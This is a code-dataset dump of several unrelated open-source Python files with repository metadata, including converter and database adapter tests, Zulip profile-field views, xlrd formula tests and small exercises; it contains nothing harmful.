converter, _ = self.default_runner()
# test
result = converter.process_main(part_lines)
# assert
self.assertListEqual(
result,
[
"module n__simple_test() {",
" // Simple Test File",
" // Name: simple_test.dat",
" ",
" color(lego_colours[16])",
" polyhedron(points=[",
" [1, 1, 1],",
" [1, 1, -1],",
" [-1, 1, -1],",
" [-1, 1, 1]",
" ], faces = [[0, 1, 2, 3]]);",
" ",
"}",
"color(lego_colours[16])",
" multmatrix([",
" [22, 21, 20, 25],",
" [19, 18, 17, 24],",
" [16, 15, 14, 23],",
" [0, 0, 0, 1]",
" ])",
" n__simple_test();"
]
)
def test_multiple_lines_should_only_make_a_single_module_for_multiple_type_1_refs(self):
# setup
lines = [
"1 16 25 24 23 22 21 20 19 18 17 16 15 14 simple_test.dat",
"1 16 2.5 2.4 2.3 2.2 2.1 2.0 1.9 1.8 1.7 1.6 1.5 1.4 simple_test.dat",
]
# Test
converter, _ = self.default_runner()
result = converter.process_main(lines)
# Assert
self.assertEqual(result, [
"module n__simple_test() {",
" // Simple Test File",
" // Name: simple_test.dat",
" ",
" color(lego_colours[16])",
" polyhedron(points=[",
" [1, 1, 1],",
" [1, 1, -1],",
" [-1, 1, -1],",
" [-1, 1, 1]",
" ], faces = [[0, 1, 2, 3]]);",
" ",
"}",
"color(lego_colours[16])",
" multmatrix([",
" [22, 21, 20, 25],",
" [19, 18, 17, 24],",
" [16, 15, 14, 23],",
" [0, 0, 0, 1]",
" ])",
" n__simple_test();",
"color(lego_colours[16])",
" multmatrix([",
" [2.2, 2.1, 2.0, 2.5],",
" [1.9, 1.8, 1.7, 2.4],",
" [1.6, 1.5, 1.4, 2.3],",
" [0, 0, 0, 1]",
" ])",
" n__simple_test();",
])
def test_try_simplest_mpd(self):
# setup
lines = [
# 1 - ref the mpd
"1 16 225 224 223 222 221 220 219 218 217 216 215 214 mdr_inner.ldr",
"0 NOFILE",
"0 FILE mdr_inner.ldr",
"4 16 1 1 0 0.9239 1 0.3827 0.9239 0 0.3827 1 0 0",
"0 NOFILE"
]
# test
converter, _ = self.default_runner()
result = converter.process_main(lines)
# assert
self.assertEqual(result, [
"module n__mdr_inner() {",
" color(lego_colours[16])",
" polyhedron(points=[",
" [1, 1, 0],",
" [0.9239, 1, 0.3827],",
" [0.9239, 0, 0.3827],",
" [1, 0, 0]",
" ], faces = [[0, 1, 2, 3]]);",
" ",
"}",
"color(lego_colours[16])",
" multmatrix([",
" [222, 221, 220, 225],",
" [219, 218, 217, 224],",
" [216, 215, 214, 223],",
" [0, 0, 0, 1]",
" ])",
" n__mdr_inner();",
"",
])
def test_loading_an_mpd(self):
# Setup
mpd_filename = "mpd_test.dat"
# Test
converter, _ = self.default_runner()
with open(mpd_filename) as fd:
output = converter.process_main(fd)
# Assert
self.maxDiff = None
self.assertListEqual(output,
[
"module n__simple_test() {",
" // Simple Test File",
" // Name: simple_test.dat",
" ",
" color(lego_colours[16])",
" polyhedron(points=[",
" [1, 1, 1],",
" [1, 1, -1],",
" [-1, 1, -1],",
" [-1, 1, 1]",
" ], faces = [[0, 1, 2, 3]]);",
" ",
"}",
"module n__mdr_inner() {",
" color(lego_colours[16])",
" multmatrix([",
" [22, 21, 20, 25],",
" [19, 18, 17, 24],",
" [16, 15, 14, 23],",
" [0, 0, 0, 1]",
" ])",
" n__simple_test();",
" ",
"}",
"// Simple MPD File",
"// Name: mdp_test.dat",
"",
"color(lego_colours[16])",
" multmatrix([",
" [222, 221, 220, 225],",
" [219, 218, 217, 224],",
" [216, 215, 214, 223],",
" [0, 0, 0, 1]",
" ])",
" n__mdr_inner();",
"",
""
]) | 34.226913 | 94 | 0.438252 |
acf6cbdd6763fc71d8c3c525548564c05eea5039 | 9,493 | py | Python | tests/test_sqlite.py | tor4z/Skua | b45b3aafc045ef19f5efb6d2b7e71479d8d1d6c7 | [
"MIT"
] | null | null | null | tests/test_sqlite.py | tor4z/Skua | b45b3aafc045ef19f5efb6d2b7e71479d8d1d6c7 | [
"MIT"
] | null | null | null | tests/test_sqlite.py | tor4z/Skua | b45b3aafc045ef19f5efb6d2b7e71479d8d1d6c7 | [
"MIT"
] | null | null | null | import unittest
import random
from skua.adapter.sqlite import SQLiteDB
from skua.adapter.database import (DatabaseError,
DatabaseWarning)
TEST_DB = "skua_test"
_STR = "asbcdefhijklmnopqrstuvwxyz_"
def random_str(k):
return "".join(random.choices(_STR, k=5))
class TestSQLite(unittest.TestCase):
def new_db(self):
sqlite = SQLiteDB()
sqlite.connect()
return sqlite
def test_exit_table(self):
sqlite = self.new_db()
self.assertFalse(sqlite.table_exit("some_table_unexist"))
sqlite.close()
def test_new_delete_table(self):
sqlite = self.new_db()
for _ in range(5):
table = random_str(5)
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
self.assertTrue(sqlite.table_exit(table))
sqlite.delete_table(table)
self.assertFalse(sqlite.table_exit(table))
sqlite.close()
def test_insert_find_remove(self):
sqlite = self.new_db()
table = "test_insert"
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
for _ in range(50):
name = random_str(5)
age = random.randint(0, 100)
sqlite.add_one(table, {
"name": name,
"age": age})
user = sqlite.find_one(table, {
"name": name})
self.assertEqual(user["name"], name)
name = random_str(5)
age = 20
sqlite.add_one(table, {
"name": name,
"age": age})
users = sqlite.find_many(table, {"age": age})
self.assertGreater(len(users), 0)
least = 10
users = sqlite.find_many(table, {"age": SQLiteDB.gt(least)})
for user in users:
self.assertGreater(user["age"], least)
sqlite.delete_table(table)
sqlite.close()
def test_delete_item(self):
sqlite = self.new_db()
table = "test_delete_item"
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
for _ in range(50):
name = random_str(5)
age = random.randint(0, 100)
sqlite.add_one(table, {
"name": name,
"age": age})
user = sqlite.find_one(table, {"name": name})
self.assertIsNotNone(user)
sqlite.remove(table, {"name": name})
user = sqlite.find_one(table, {"name": name})
self.assertIsNone(user)
sqlite.delete_table(table)
sqlite.close()
def test_update_item(self):
sqlite = self.new_db()
table = "test_update_item"
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
for _ in range(50):
name = random_str(5)
age = random.randint(0, 100)
sqlite.add_one(table, {
"name": name,
"age": age})
old_user = sqlite.find_one(table, {"name": name})
new_age = random.randint(0, 100)
sqlite.update(table, {"age": new_age}, {"name": name})
new_user = sqlite.find_one(table, {"name": name})
self.assertEqual(new_user["age"], new_age)
sqlite.delete_table(table)
sqlite.close()
def test_add_many(self):
sqlite = self.new_db()
table = "test_add_many"
count = 50
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
users = []
for _ in range(count):
name = random_str(5)
age = random.randint(0, 100)
users.append({"name": name,
"age": age})
sqlite.add_many(table, users)
users = sqlite.find_many(table, {})
self.assertEqual(len(users), count)
sqlite.delete_table(table)
sqlite.close()
def test_count(self):
sqlite = self.new_db()
table = "test_count"
count = 100
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
users = []
eq5 = 0
for _ in range(count):
name = random_str(5)
age = random.randint(0, 10)
if age == 5:
eq5 += 1
users.append({
"name": name,
"age": age})
sqlite.add_many(table, users)
self.assertEqual(sqlite.count(table, {}), count)
self.assertEqual(sqlite.count(table, {"age": 5}), eq5)
sqlite.delete_table(table)
sqlite.close()
def test_add_update(self):
sqlite = self.new_db()
table = "test_add_update"
count = 50
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
for _ in range(count):
name = random_str(20)
age = random.randint(0, 49)
user = {"name": name,
"age": age}
sqlite.add_update(table, user)
for _ in range(count):
user = sqlite.find_one(table, {})
user["age"] = random.randint(50, 100)
sqlite.add_update(table, user, {"name": user["name"]})
new_user = sqlite.find_one(table, {"name": user["name"]})
self.assertTrue(user["age"] == new_user["age"])
new_users = sqlite.find_many(table, {"name": user["name"]})
self.assertEqual(len(new_users), 1)
user["age"] = random.randint(101, 120)
sqlite.add_update(table, user)
new_users = sqlite.find_many(table, {"name": user["name"]})
self.assertEqual(len(new_users), 2)
sqlite.remove(table, {"name": user["name"]})
sqlite.delete_table(table)
sqlite.close()
def test_find_gt_ge_lt_le(self):
sqlite = self.new_db()
table = "test_find_gt_ge_lt_le"
count = 200
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
users = []
for _ in range(count):
name = random_str(5)
age = random.randint(0, 100)
user = {"name": name,
"age": age}
users.append(user)
sqlite.add_one(table, user)
users_gt_50 = sqlite.find_many(table, {"age": SQLiteDB.gt(50)})
for user in users_gt_50:
self.assertGreater(user["age"], 50)
users_ge_50 = sqlite.find_many(table, {"age": SQLiteDB.ge(50)})
for user in users_ge_50:
self.assertGreaterEqual(user["age"], 50)
users_lt_50 = sqlite.find_many(table, {"age": SQLiteDB.lt(50)})
for user in users_lt_50:
self.assertLess(user["age"], 50)
users_le_50 = sqlite.find_many(table, {"age": SQLiteDB.le(50)})
for user in users_le_50:
self.assertLessEqual(user["age"], 50)
sqlite.delete_table(table)
sqlite.close()
def test_type_checker(self):
sqlite = self.new_db()
table = "test_find_one_order"
count = 5
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
users = []
for _ in range(count):
name = random_str(5)
age = random.randint(0, 100)
user = [("name", name),
("age", age)]
users.append(user)
with self.assertRaises(TypeError):
sqlite.add(table, user)
with self.assertRaises(TypeError):
sqlite.add_many(table, {})
def test_connect_twice(self):
sqlite = SQLiteDB()
sqlite.connect()
with self.assertRaises(DatabaseError):
sqlite.connect()
sqlite.close()
def test_find_many_order(self):
sqlite = self.new_db()
table = "test_find_many_order"
count = 50
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
users = []
for _ in range(count):
name = random_str(5)
age = random.randint(0, 100)
user = {"name": name,
"age": age}
users.append(user)
sqlite.add_one(table, user)
users = sqlite.find_many(table, {}, orderby="age")
old_age = 0
for user in users:
self.assertGreaterEqual(user["age"], old_age)
old_age = user["age"]
sqlite.delete_table(table)
sqlite.close()
def test_find_one_order(self):
sqlite = self.new_db()
table = "test_find_one_order"
count = 50
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
users = []
for _ in range(count):
name = random_str(5)
age = random.randint(0, 100)
user = {"name": name,
"age": age}
users.append(user)
sqlite.add_one(table, user)
old_age = 0
for _ in range(count):
user = sqlite.find_one(table, {}, orderby="age")
self.assertGreaterEqual(user["age"], old_age)
old_age = user["age"]
sqlite.delete_table(table)
sqlite.close()
| 31.022876 | 72 | 0.510165 |
acf6cc3f861b8c90411822317ce68a8f30a4f89d | 3,263 | py | Python | tierpsy/helper/params/docs_process_param.py | mgh17/tierpsy-tracker | a18c06aa80a5fb22fd51563d82c639b520742777 | [
"MIT"
] | 9 | 2021-01-11T10:49:21.000Z | 2022-02-28T15:48:00.000Z | tierpsy/helper/params/docs_process_param.py | mgh17/tierpsy-tracker | a18c06aa80a5fb22fd51563d82c639b520742777 | [
"MIT"
] | 18 | 2020-05-08T15:43:08.000Z | 2022-03-23T10:19:24.000Z | tierpsy/helper/params/docs_process_param.py | mgh17/tierpsy-tracker | a18c06aa80a5fb22fd51563d82c639b520742777 | [
"MIT"
] | 10 | 2019-12-18T12:10:12.000Z | 2022-01-05T09:12:47.000Z | '''
List of default values and description of the tierpsy.processing.progressMultipleFilesFun
'''
import os
from tierpsy import IS_FROZEN
from .helper import repack_dflt_list
#get 90% of the number of cores as the default max_num_process
import multiprocessing as mp
_max_num_process = max(1, int(mp.cpu_count()*0.9))
#set this to false if it is a compiled version (we do not want to scare the users with the traceback information)
_is_debug = not IS_FROZEN
dflt_args_list = [
('video_dir_root',
'',
'Root directory where the raw videos are located.'
),
('mask_dir_root',
'',
'''
Root directory where the masked videos (after COMPRESSION) are located or will be stored.
If it is not given it will be created replacing RawVideos by MaskedVideos in the video_dir_root.
'''
),
('results_dir_root',
'',
'''
Root directory where the tracking results are located or will be stored.
If it is not given it will be created replacing MaskedVideos by Results in the mask_dir_root.
'''
),
('tmp_dir_root',
os.path.join(os.path.expanduser("~"), 'Tmp'),
'Temporary directory where the unfinished analysis files are going to be stored.'
),
('videos_list',
'',
'''
File containing the full path of the files to be analyzed.
If it is not given files will be searched in video_dir_root or mask_dir_root
using pattern_include and pattern_exclude.
'''
),
('json_file',
'',
'File (.json) containing the tracking parameters.'
),
('max_num_process',
_max_num_process,
'Maximum number of files to be processed simultaneously.'
),
('pattern_include',
'*.hdf5',
'Pattern used to search files to be analyzed.'
),
('pattern_exclude',
'',
'Pattern used to exclude files to be analyzed.'
),
('is_copy_video',
False,
'Set **true** to copy the raw videos files to the temporary directory.'
),
('copy_unfinished',
False,
'Copy files to the final destination even if the analysis was not completed successfully.'
),
('analysis_checkpoints',
[],
'Points in the analysis to be executed.'),
('force_start_point',
'',
'Force the program to start at a specific point in the analysis.'
),
('end_point',
'',
'Stop the analysis at a specific point.'
),
('only_summary',
False,
'Set **true** if you only want to see a summary of how many files are going to be analyzed.'
),
('unmet_requirements',
False,
'Use this flag if you only want to print the unmet requirements of the invalid source files.'
),
('refresh_time',
10.,
'Refresh time in seconds of the progress screen.'
),
('is_debug',
_is_debug,
'Print debug information after an error.'
),
]
process_valid_options = {}
proccess_args_dflt, proccess_args_info = repack_dflt_list(dflt_args_list, valid_options=process_valid_options)
| 29.663636 | 113 | 0.607723 |
acf6cd2052a06b3eb7866132e6d2fd7b00da6ee6 | 855 | py | Python | tests/test_spark_tools.py | sobolevn/paasta | 8b87e0b13816c09b3d063b6d3271e6c7627fd264 | [
"Apache-2.0"
] | 1,711 | 2015-11-10T18:04:56.000Z | 2022-03-23T08:53:16.000Z | tests/test_spark_tools.py | sobolevn/paasta | 8b87e0b13816c09b3d063b6d3271e6c7627fd264 | [
"Apache-2.0"
] | 1,689 | 2015-11-10T17:59:04.000Z | 2022-03-31T20:46:46.000Z | tests/test_spark_tools.py | sobolevn/paasta | 8b87e0b13816c09b3d063b6d3271e6c7627fd264 | [
"Apache-2.0"
] | 267 | 2015-11-10T19:17:16.000Z | 2022-02-08T20:59:52.000Z | from unittest import mock
import pytest
from paasta_tools import spark_tools
def test_get_webui_url():
with mock.patch("socket.getfqdn", return_value="1.2.3.4"):
assert spark_tools.get_webui_url("1234") == "http://1.2.3.4:1234"
@pytest.mark.parametrize(
"cmd,expected",
[
("spark-shell", "spark-shell --conf spark.max.cores=100"),
(
"/venv/bin/pyspark test.py",
"/venv/bin/pyspark --conf spark.max.cores=100 test.py",
),
(
"spark-submit script.py --other args",
"spark-submit --conf spark.max.cores=100 script.py --other args",
),
("history-server", "history-server"),
],
)
def test_inject_spark_conf_str(cmd, expected):
assert (
spark_tools.inject_spark_conf_str(cmd, "--conf spark.max.cores=100") == expected
)
| 26.71875 | 88 | 0.607018 |
acf6cd540a9de626f765594d81fcb47322899f2e | 1,022 | py | Python | Python_OOP_Softuni/Exam_Prep_02AprilExam/project/card/card.py | borisboychev/SoftUni | 22062312f08e29a1d85377a6d41ef74966d37e99 | [
"MIT"
] | 1 | 2020-12-14T23:25:19.000Z | 2020-12-14T23:25:19.000Z | Python_OOP_Softuni/Exam_Prep_02AprilExam/project/card/card.py | borisboychev/SoftUni | 22062312f08e29a1d85377a6d41ef74966d37e99 | [
"MIT"
] | null | null | null | Python_OOP_Softuni/Exam_Prep_02AprilExam/project/card/card.py | borisboychev/SoftUni | 22062312f08e29a1d85377a6d41ef74966d37e99 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
class Card(ABC):
@abstractmethod
def __init__(self, name, damage_points, health_points):
self.name = name
self.damage_points = damage_points
self.health_points = health_points
@property
def name(self):
return self._name
@name.setter
def name(self, value):
if value == "":
raise ValueError("Card's name cannot be an empty string.")
self._name = value
@property
def damage_points(self):
return self._damage_points
@damage_points.setter
def damage_points(self, value):
if value < 0:
raise ValueError("Card's damage points cannot be less than zero.")
self._damage_points = value
@property
def health_points(self):
return self._health_points
@health_points.setter
def health_points(self, value):
if value < 0:
raise ValueError("Card's HP cannot be less than zero.")
self._health_points = value
| 24.926829 | 78 | 0.633072 |
acf6cf0f338211b58b347775ef40666ed4828ad4 | 926 | py | Python | examples/pybullet/gym/pybullet_envs/baselines/enjoy_pybullet_zed_racecar.py | frk2/bullet3 | 225d823e4dc3f952c6c39920c3f87390383e0602 | [
"Zlib"
] | 51 | 2018-11-11T12:47:38.000Z | 2022-03-06T08:39:43.000Z | examples/pybullet/gym/pybullet_envs/baselines/enjoy_pybullet_zed_racecar.py | frk2/bullet3 | 225d823e4dc3f952c6c39920c3f87390383e0602 | [
"Zlib"
] | 2 | 2019-11-15T03:21:45.000Z | 2020-09-10T11:53:58.000Z | examples/pybullet/gym/pybullet_envs/baselines/enjoy_pybullet_zed_racecar.py | frk2/bullet3 | 225d823e4dc3f952c6c39920c3f87390383e0602 | [
"Zlib"
] | 14 | 2018-12-12T09:12:14.000Z | 2021-10-17T14:30:25.000Z | #add parent dir to find package. Only needed for source code build, pip install doesn't need it.
import os, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
os.sys.path.insert(0,parentdir)
import gym
from pybullet_envs.bullet.racecarZEDGymEnv import RacecarZEDGymEnv
from baselines import deepq
def main():
env = RacecarZEDGymEnv(renders=True)
act = deepq.load("racecar_zed_model.pkl")
print(act)
while True:
obs, done = env.reset(), False
print("===================================")
print("obs")
print(obs)
episode_rew = 0
while not done:
env.render()
obs, rew, done, _ = env.step(act(obs[None])[0])
episode_rew += rew
print("Episode reward", episode_rew)
if __name__ == '__main__':
main()
| 28.060606 | 96 | 0.62311 |
acf6cf3c0f6b8f45a53592c0af47e934dcf105cb | 420 | py | Python | Datacamp Assignments/Data Engineer Track/2. Streamlined Data Ingestion with pandas/30_work_with_json_orientation.py | Ali-Parandeh/Data_Science_Playground | c529e9b3692381572de259e7c93938d6611d83da | [
"MIT"
] | null | null | null | Datacamp Assignments/Data Engineer Track/2. Streamlined Data Ingestion with pandas/30_work_with_json_orientation.py | Ali-Parandeh/Data_Science_Playground | c529e9b3692381572de259e7c93938d6611d83da | [
"MIT"
] | null | null | null | Datacamp Assignments/Data Engineer Track/2. Streamlined Data Ingestion with pandas/30_work_with_json_orientation.py | Ali-Parandeh/Data_Science_Playground | c529e9b3692381572de259e7c93938d6611d83da | [
"MIT"
] | 1 | 2021-03-10T09:40:05.000Z | 2021-03-10T09:40:05.000Z | try:
# Load the JSON with orient specified
df = pd.read_json("dhs_report_reformatted.json",
orient='split')
# Plot total population in shelters over time
df["date_of_census"] = pd.to_datetime(df["date_of_census"])
df.plot(x="date_of_census",
y="total_individuals_in_shelter")
plt.show()
except ValueError:
print("pandas could not parse the JSON.") | 32.307692 | 63 | 0.640476 |
acf6d0159aa4faf68b55cfa43a6f20c49b29b310 | 7,683 | py | Python | zerver/views/custom_profile_fields.py | rmit-s3603315-benjamin-randall/SpecialEdd | 014fd2b220f52762848592cab90c493d1c77682d | [
"Apache-2.0"
] | null | null | null | zerver/views/custom_profile_fields.py | rmit-s3603315-benjamin-randall/SpecialEdd | 014fd2b220f52762848592cab90c493d1c77682d | [
"Apache-2.0"
] | 7 | 2020-09-06T14:54:30.000Z | 2022-02-10T18:51:14.000Z | zerver/views/custom_profile_fields.py | b-randall/SpecialEdd | 014fd2b220f52762848592cab90c493d1c77682d | [
"Apache-2.0"
] | 1 | 2018-10-13T04:20:36.000Z | 2018-10-13T04:20:36.000Z |
from typing import Union, List, Dict, Optional, cast
import logging
import ujson
from django.core.exceptions import ValidationError
from django.db import IntegrityError, connection
from django.http import HttpRequest, HttpResponse
from django.utils.translation import ugettext as _
from zerver.decorator import require_realm_admin, human_users_only
from zerver.lib.request import has_request_variables, REQ
from zerver.lib.actions import (try_add_realm_custom_profile_field,
do_remove_realm_custom_profile_field,
try_update_realm_custom_profile_field,
do_update_user_custom_profile_data,
try_reorder_realm_custom_profile_fields,
notify_user_update_custom_profile_data)
from zerver.lib.response import json_success, json_error
from zerver.lib.types import ProfileFieldData
from zerver.lib.validator import (check_dict, check_list, check_int,
validate_field_data, check_capped_string)
from zerver.models import (custom_profile_fields_for_realm, UserProfile, CustomProfileFieldValue,
CustomProfileField, custom_profile_fields_for_realm)
def list_realm_custom_profile_fields(request: HttpRequest, user_profile: UserProfile) -> HttpResponse:
fields = custom_profile_fields_for_realm(user_profile.realm_id)
return json_success({'custom_fields': [f.as_dict() for f in fields]})
hint_validator = check_capped_string(CustomProfileField.HINT_MAX_LENGTH)
@require_realm_admin
@has_request_variables
def create_realm_custom_profile_field(request: HttpRequest,
user_profile: UserProfile, name: str=REQ(),
hint: str=REQ(default=''),
field_data: ProfileFieldData=REQ(default={},
converter=ujson.loads),
field_type: int=REQ(validator=check_int)) -> HttpResponse:
if not name.strip():
return json_error(_("Name cannot be blank."))
error = hint_validator('hint', hint)
if error:
return json_error(error)
field_types = [i[0] for i in CustomProfileField.FIELD_TYPE_CHOICES]
if field_type not in field_types:
return json_error(_("Invalid field type."))
error = validate_field_data(field_data)
if error:
return json_error(error)
try:
field = try_add_realm_custom_profile_field(
realm=user_profile.realm,
name=name,
field_data=field_data,
field_type=field_type,
hint=hint,
)
return json_success({'id': field.id})
except IntegrityError:
return json_error(_("A field with that name already exists."))
@require_realm_admin
def delete_realm_custom_profile_field(request: HttpRequest, user_profile: UserProfile,
field_id: int) -> HttpResponse:
try:
field = CustomProfileField.objects.get(id=field_id)
except CustomProfileField.DoesNotExist:
return json_error(_('Field id {id} not found.').format(id=field_id))
do_remove_realm_custom_profile_field(realm=user_profile.realm,
field=field)
return json_success()
@require_realm_admin
@has_request_variables
def update_realm_custom_profile_field(request: HttpRequest, user_profile: UserProfile,
field_id: int, name: str=REQ(),
hint: str=REQ(default=''),
field_data: ProfileFieldData=REQ(default={},
converter=ujson.loads),
) -> HttpResponse:
if not name.strip():
return json_error(_("Name cannot be blank."))
error = hint_validator('hint', hint)
if error:
return json_error(error, data={'field': 'hint'})
error = validate_field_data(field_data)
if error:
return json_error(error)
realm = user_profile.realm
try:
field = CustomProfileField.objects.get(realm=realm, id=field_id)
except CustomProfileField.DoesNotExist:
return json_error(_('Field id {id} not found.').format(id=field_id))
try:
try_update_realm_custom_profile_field(realm, field, name, hint=hint,
field_data=field_data)
except IntegrityError:
return json_error(_('A field with that name already exists.'))
return json_success()
@require_realm_admin
@has_request_variables
def reorder_realm_custom_profile_fields(request: HttpRequest, user_profile: UserProfile,
order: List[int]=REQ(validator=check_list(
check_int))) -> HttpResponse:
try_reorder_realm_custom_profile_fields(user_profile.realm, order)
return json_success()
@human_users_only
@has_request_variables
def remove_user_custom_profile_data(request: HttpRequest, user_profile: UserProfile,
data: List[int]=REQ(validator=check_list(
check_int))) -> HttpResponse:
for field_id in data:
try:
field = CustomProfileField.objects.get(realm=user_profile.realm, id=field_id)
except CustomProfileField.DoesNotExist:
return json_error(_('Field id {id} not found.').format(id=field_id))
try:
field_value = CustomProfileFieldValue.objects.get(field=field, user_profile=user_profile)
except CustomProfileFieldValue.DoesNotExist:
continue
field_value.delete()
notify_user_update_custom_profile_data(user_profile, {'id': field_id, 'value': None})
return json_success()
@human_users_only
@has_request_variables
def update_user_custom_profile_data(
request: HttpRequest,
user_profile: UserProfile,
data: List[Dict[str, Union[int, str, List[int]]]]=REQ(validator=check_list(
check_dict([('id', check_int)])))) -> HttpResponse:
for item in data:
field_id = item['id']
try:
field = CustomProfileField.objects.get(id=field_id)
except CustomProfileField.DoesNotExist:
return json_error(_('Field id {id} not found.').format(id=field_id))
validators = CustomProfileField.FIELD_VALIDATORS
field_type = field.field_type
var_name = '{}'.format(field.name)
value = item['value']
if field_type in validators:
validator = validators[field_type]
result = validator(var_name, value)
elif field_type == CustomProfileField.CHOICE:
choice_field_validator = CustomProfileField.CHOICE_FIELD_VALIDATORS[field_type]
field_data = field.field_data
result = choice_field_validator(var_name, field_data, value)
elif field_type == CustomProfileField.USER:
user_field_validator = CustomProfileField.USER_FIELD_VALIDATORS[field_type]
result = user_field_validator(user_profile.realm.id, cast(List[int], value),
False)
else:
raise AssertionError("Invalid field type")
if result is not None:
return json_error(result)
do_update_user_custom_profile_data(user_profile, data)
# We need to call this explicitly otherwise constraints are not check
return json_success()
| 43.162921 | 102 | 0.639724 |
acf6d245b06f4d9ff86d82dd8d45d6aa9fcb6c6d | 2,323 | py | Python | handleExcel/exportor/scripts/xlrd-1.0.0/tests/test_formulas.py | Jack301/toolkit | 2d1e37a36281af7722be93d4d5299c1ce8b7f365 | [
"MIT"
] | 95 | 2016-09-30T02:55:26.000Z | 2022-01-12T05:47:30.000Z | handleExcel/exportor/scripts/xlrd-1.0.0/tests/test_formulas.py | Jack301/toolkit | 2d1e37a36281af7722be93d4d5299c1ce8b7f365 | [
"MIT"
] | 3 | 2017-08-03T07:37:09.000Z | 2018-04-13T11:47:09.000Z | handleExcel/exportor/scripts/xlrd-1.0.0/tests/test_formulas.py | Jack301/toolkit | 2d1e37a36281af7722be93d4d5299c1ce8b7f365 | [
"MIT"
] | 32 | 2017-03-28T06:45:09.000Z | 2021-12-21T10:33:10.000Z | # -*- coding: utf-8 -*-
# Portions Copyright (C) 2010, Manfred Moitzi under a BSD licence
from unittest import TestCase
import os
import sys
import xlrd
from .base import from_this_dir
try:
ascii
except NameError:
# For Python 2
def ascii(s):
a = repr(s)
if a.startswith(('u"', "u'")):
a = a[1:]
return a
class TestFormulas(TestCase):
def setUp(self):
book = xlrd.open_workbook(from_this_dir('formula_test_sjmachin.xls'))
self.sheet = book.sheet_by_index(0)
def get_value(self, col, row):
return ascii(self.sheet.col_values(col)[row])
def test_cell_B2(self):
self.assertEqual(
self.get_value(1, 1),
r"'\u041c\u041e\u0421\u041a\u0412\u0410 \u041c\u043e\u0441\u043a\u0432\u0430'"
)
def test_cell_B3(self):
self.assertEqual(self.get_value(1, 2), '0.14285714285714285')
def test_cell_B4(self):
self.assertEqual(self.get_value(1, 3), "'ABCDEF'")
def test_cell_B5(self):
self.assertEqual(self.get_value(1, 4), "''")
def test_cell_B6(self):
self.assertEqual(self.get_value(1, 5), '1')
def test_cell_B7(self):
self.assertEqual(self.get_value(1, 6), '7')
def test_cell_B8(self):
self.assertEqual(
self.get_value(1, 7),
r"'\u041c\u041e\u0421\u041a\u0412\u0410 \u041c\u043e\u0441\u043a\u0432\u0430'"
)
class TestNameFormulas(TestCase):
def setUp(self):
book = xlrd.open_workbook(from_this_dir('formula_test_names.xls'))
self.sheet = book.sheet_by_index(0)
def get_value(self, col, row):
return ascii(self.sheet.col_values(col)[row])
def test_unaryop(self):
self.assertEqual(self.get_value(1, 1), '-7.0')
def test_attrsum(self):
self.assertEqual(self.get_value(1, 2), '4.0')
def test_func(self):
self.assertEqual(self.get_value(1, 3), '6.0')
def test_func_var_args(self):
self.assertEqual(self.get_value(1, 4), '3.0')
def test_if(self):
self.assertEqual(self.get_value(1, 5), "'b'")
def test_choose(self):
self.assertEqual(self.get_value(1, 6), "'C'")
| 27.654762 | 91 | 0.589324 |
acf6d2f54f3806149acae2613e2852e3050804cd | 1,102 | py | Python | tests/test_field.py | Dagurmart/graphene-django-plus-optimizer | dd9b32822b59b653fa29df955b0fffa41a0a9dad | [
"MIT"
] | null | null | null | tests/test_field.py | Dagurmart/graphene-django-plus-optimizer | dd9b32822b59b653fa29df955b0fffa41a0a9dad | [
"MIT"
] | null | null | null | tests/test_field.py | Dagurmart/graphene-django-plus-optimizer | dd9b32822b59b653fa29df955b0fffa41a0a9dad | [
"MIT"
] | null | null | null | import graphene_django_plus_optimizer as gql_optimizer
from .graphql_utils import create_resolve_info
from .models import (
Item,
)
from .schema import schema
from .test_utils import assert_query_equality
def test_should_optimize_non_django_field_if_it_has_an_optimization_hint_in_the_field():
info = create_resolve_info(schema, '''
query {
items(name: "bar") {
id
foo
father {
id
}
}
}
''')
qs = Item.objects.filter(name='bar')
items = gql_optimizer.query(qs, info)
optimized_items = qs.select_related('parent')
assert_query_equality(items, optimized_items)
def test_should_optimize_with_only_hint():
info = create_resolve_info(schema, '''
query {
items(name: "foo") {
id
title
}
}
''')
qs = Item.objects.filter(name='foo')
items = gql_optimizer.query(qs, info)
optimized_items = qs.only('id', 'name')
assert_query_equality(items, optimized_items)
| 26.238095 | 88 | 0.604356 |
acf6d300053ff876711824e78791842ff7409ea3 | 868 | py | Python | main.py | jjdicharry/veogit_proxy | 1b8f9ab2c9fb84912d6239cd7d096249572187f8 | [
"Apache-2.0"
] | null | null | null | main.py | jjdicharry/veogit_proxy | 1b8f9ab2c9fb84912d6239cd7d096249572187f8 | [
"Apache-2.0"
] | null | null | null | main.py | jjdicharry/veogit_proxy | 1b8f9ab2c9fb84912d6239cd7d096249572187f8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2021 Jeremiah Dicharry
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import webapp2
from config import debug_mode
from config import main_url
class HomeHandler(webapp2.RequestHandler):
def get(self):
self.redirect(main_url)
app = webapp2.WSGIApplication([
(r"/", HomeHandler)
], debug=debug_mode)
| 28 | 74 | 0.754608 |
acf6d57ca2c2d07b78c1ccfa6022eededd49bf83 | 1,219 | py | Python | inaSpeechSegmenter/__init__.py | vancdk/inaSpeechSegmenter | eb22d8940f86f2917c7b8f6d0fd17c4fc73e2732 | [
"MIT"
